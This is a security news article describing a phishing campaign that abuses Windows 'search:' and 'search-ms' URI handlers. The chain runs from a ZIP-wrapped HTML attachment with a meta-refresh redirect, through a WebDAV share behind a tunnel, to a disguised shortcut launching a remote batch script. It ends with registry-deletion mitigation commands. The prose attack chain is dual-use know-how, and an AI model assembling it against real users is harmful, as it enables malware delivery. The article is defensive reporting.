Hackers Abuse Windows Search functionality to deploy malware

A recent malware campaign exploits a vulnerability in the way Windows handles HTML code, where attackers embed code utilizing the “search:” URI protocol handler. 

The code, when executed by the system, fetches a shortcut file (.LNK) from a remote server and displays it within Windows Explorer, disguising it as a legitimate search result. 

Phishing attackers are using a ZIP archive containing an HTML attachment to bypass email security scanners, which, disguised as a document like an invoice, shrinks file size for faster transmission and avoids detection by scanners that don’t inspect compressed content. 

MailMarshal extracts the HTML file from the ZIP archive.

This extra layer tricks users into opening the attachment, potentially compromising their security. While the campaign is currently low-volume, it demonstrates a new technique for phishing attempts. 

A malicious HTML attachment designed to exploit Windows systems is being used in email campaigns, which utilizes a meta refresh tag to instantly redirect the user’s browser to a malicious URL upon opening the attachment.  

If the automatic redirection fails, an anchor tag within the code provides a clickable link that can be used to launch the attack as well, which bypasses potential user awareness and increases the success rate of the exploit. 

Code snippet of the HTML attachment.

Attackers exploit a feature in Windows called the search protocol (search:) to trigger a search directly within Windows Explorer, which allows applications to initiate search queries, but malicious actors can abuse it to bypass user confirmation. 

When a user executes a seemingly harmless search command, a browsing prompt appears—a security measure to prevent unauthorized actions—but in the background, the application utilizes the search protocol to execute a hidden search query, potentially leading to harmful actions without the user’s knowledge or consent. 

Browsing prompt triggered upon execution of the search command.

An attacker leverages a vulnerability to manipulate a Windows Explorer search, where the attacker crafted a search query targeting files named “INVOICE” within a malicious directory disguised as a user’s “Downloads” folder through a compromised server hidden by Cloudflare’s tunneling service. 

WebDAV integration presents remote files as local for a more convincing attack, and if a user allows the search, a single shortcut file pointing to a malicious batch script on the remote server is displayed in the results. 

According to Trustwave SpiderLabs, the specific payload couldn’t be retrieved, while the exploit demonstrates a tactic of abusing user trust and system vulnerabilities. 

Search window displaying results after invoking the search query.

Attackers are exploiting the search-ms/search URI protocol to launch attacks, which can be abused through HTML documents to execute malicious scripts.  While user interaction is required, attackers can trick users into clicking by disguising malicious files as trusted ones. 

To mitigate this attack, users can delete the associated registry entries with commands: reg delete HKEY_CLASSES_ROOT\search /f and reg delete HKEY_CLASSES_ROOT\search-ms /f. 

Also Read:

Kaaviya
Kaaviyahttps://cyberpress.org/
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She is covering various cyber security incidents happening in the Cyber Space.

Recent Articles

Related Stories

LEAVE A REPLY

Please enter your comment!
Please enter your name here